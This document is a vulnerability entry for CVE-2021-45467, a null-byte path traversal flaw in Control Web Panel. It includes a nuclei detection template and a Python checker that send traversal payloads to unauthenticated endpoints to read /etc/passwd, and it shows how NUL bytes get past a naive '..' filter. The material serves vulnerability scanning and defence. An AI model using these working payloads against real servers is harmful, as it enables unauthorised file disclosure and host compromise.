In CWP (Control Web Panel, previously CentOS Web Panel) before version 0.9.8.1107, an unauthenticated attacker can abuse null byte (%00) injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be exploited by using multiple %00 sequences to traverse directories via crafted requests such as /user/loader.php?api=1&scripts=.%00./.%00./api/account_new_create&acc=guadaapi, or similar payloads with more %00 instances (e.g., .%00%00%00./.%00%00%00./api/account_new_create). Attackers may use this flaw for arbitrary file access, privilege escalation, or remote code execution.
PoC code [published]
id: CVE-2021-45467

info:
  name: Control Web Panel (CWP) - File Inclusion
  author: ritikchaddha
  severity: critical
  description: |
    In CWP (Control Web Panel, previously CentOS Web Panel) before version 0.9.8.1107, an unauthenticated attacker can abuse null byte (%00) injection with the "scripts" parameter in the /user/loader.php or /user/login.php endpoints to register arbitrary API keys or access sensitive files. This can be exploited by using multiple %00 sequences to traverse directories via crafted requests such as /user/loader.php?api=1&scripts=.%00./.%00./api/account_new_create&acc=guadaapi, or similar payloads with more %00 instances (e.g., .%00%00%00./.%00%00%00./api/account_new_create). Attackers may use this flaw for arbitrary file access, privilege escalation, or remote code execution.
  impact: |
    A remote, unauthenticated attacker can leverage this vulnerability to register arbitrary API keys, access sensitive files (such as /etc/passwd), and potentially achieve remote code execution. Successful exploitation results in full compromise of the web panel and host system, allowing for exposure of confidential data, server takeover, and further attacks on internal infrastructure.
  remediation: |
    Update to version 0.9.8.1107 or later to fix input validation issues.
  reference:
    - https://octagon.net/blog/2022/01/22/cve-2021-45467-cwp-centos-web-panel-preauth-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45467
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-45467
    epss-score: 0.89554
    epss-percentile: 0.99524
    cwe-id: CWE-862
    cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: false
    max-request: 5
    vendor: control_webpanel
    product: webpanel
    fofa-query: icon_hash="-356182173"
  tags: cve,cve2021,cwp,rce,lfi,centos,webpanel,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login/cwp_theme/original/img/ico/favicon.ico"
      - "{{BaseURL}}/login/design/img/ico/favicon.ico"
      - "{{BaseURL}}"

    redirects: true
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - "status_code==200 && ('-356182173' == mmh3(base64_py(body)))"
          - "status_code==200 && contains_any(tolower(body), 'control webpanel', 'cwp | user')"
        condition: or

  - method: GET
    path:
      - "{{BaseURL}}/user/index.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"
      - "{{BaseURL}}/user/login.php?api=1&scripts=.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./.%00%00%00./etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210081e99cbd13421ebb142be3afa0573211a7a550e000148adafdc70bfc471a26aa022025a08bf04c45ec2f3f71b80759b572bc4c9bc1578632bbca21928985f4a2d4ed:922c64590222798bb761d5b6d8e72950
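The request and matcher logic of the template above, rewritten as a standalone Python checker. This is example code added for this page; it is not part of the nuclei template, the CWP project, or the Octagon write-up. It builds the same `api=1&scripts=` probe against /user/index.php and /user/login.php with twelve `.%00%00%00./` hops, applies the same text fingerprint and `root:.*:0:0:` matcher, and stops at the first matching probe URL. It also carries a small hypothetical substring filter (`naive_dotdot_filter_blocks`, a model of a plain `..` check, not CWP's actual code) next to `path_after_nul_strip`, to show why the null-byte form passes such a check and still collapses to `../../` once the NUL bytes are dropped. The favicon `mmh3` fingerprint is left out because it needs the third-party mmh3 package; the host in the usage line is a placeholder.

```python
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

# Mirrors the template's second request: twelve ".%00%00%00./" hops, then etc/passwd.
TRAVERSAL_HOP = ".%00%00%00./"
DEPTH = 12
TARGET_FILE = "etc/passwd"
ENTRY_POINTS = ("/user/index.php", "/user/login.php")
PASSWD_RE = re.compile(r"root:.*:0:0:")  # same regex as the template's matcher

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status_code, body)


def build_probe_urls(base_url: str, depth: int = DEPTH, target: str = TARGET_FILE) -> List[str]:
    """Return the probe URLs in the order the template tries them."""
    base = base_url.rstrip("/")
    traversal = TRAVERSAL_HOP * depth
    return [f"{base}{ep}?api=1&scripts={traversal}{target}" for ep in ENTRY_POINTS]


def naive_dotdot_filter_blocks(scripts_param: str) -> bool:
    """Hypothetical substring filter (NOT CWP's code): rejects a literal '..' in the
    percent-decoded parameter. The null-byte form keeps the dots apart, so it passes."""
    decoded = urllib.parse.unquote(scripts_param)  # NUL bytes are preserved here
    return ".." in decoded


def path_after_nul_strip(scripts_param: str) -> str:
    """What the same value collapses to once every NUL byte is removed: plain '../' hops."""
    return urllib.parse.unquote(scripts_param).replace("\x00", "")


def looks_like_cwp(status: int, body: str) -> bool:
    """Template's text fingerprint (favicon mmh3 check omitted; it needs the mmh3 package)."""
    low = body.lower()
    return status == 200 and ("control webpanel" in low or "cwp | user" in low)


def passwd_leaked(status: int, body: str) -> bool:
    """Template's second matcher set: HTTP 200 AND a root entry from /etc/passwd."""
    return status == 200 and PASSWD_RE.search(body) is not None


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Default fetcher on the standard library; urlopen follows redirects like the template."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_target(base_url: str, fetch: Fetcher = http_fetch) -> Dict[str, object]:
    """Same flow as the template: fingerprint first, then probe, stopping at the first hit."""
    status, body = fetch(base_url.rstrip("/") + "/")
    result: Dict[str, object] = {
        "fingerprint": looks_like_cwp(status, body),
        "vulnerable": False,
        "matched_url": None,
    }
    if not result["fingerprint"]:
        return result
    for url in build_probe_urls(base_url):
        status, body = fetch(url)
        if passwd_leaked(status, body):
            result["vulnerable"] = True
            result["matched_url"] = url
            break
    return result


if __name__ == "__main__":
    # Usage: python cwp_check.py http://cwp.example:2030   (script name and host are placeholders)
    print(check_target(sys.argv[1]))
```

`check_target` takes the fetcher as a parameter so the matchers can be exercised against constructed responses without touching a network; only run `http_fetch` against systems you are authorised to test.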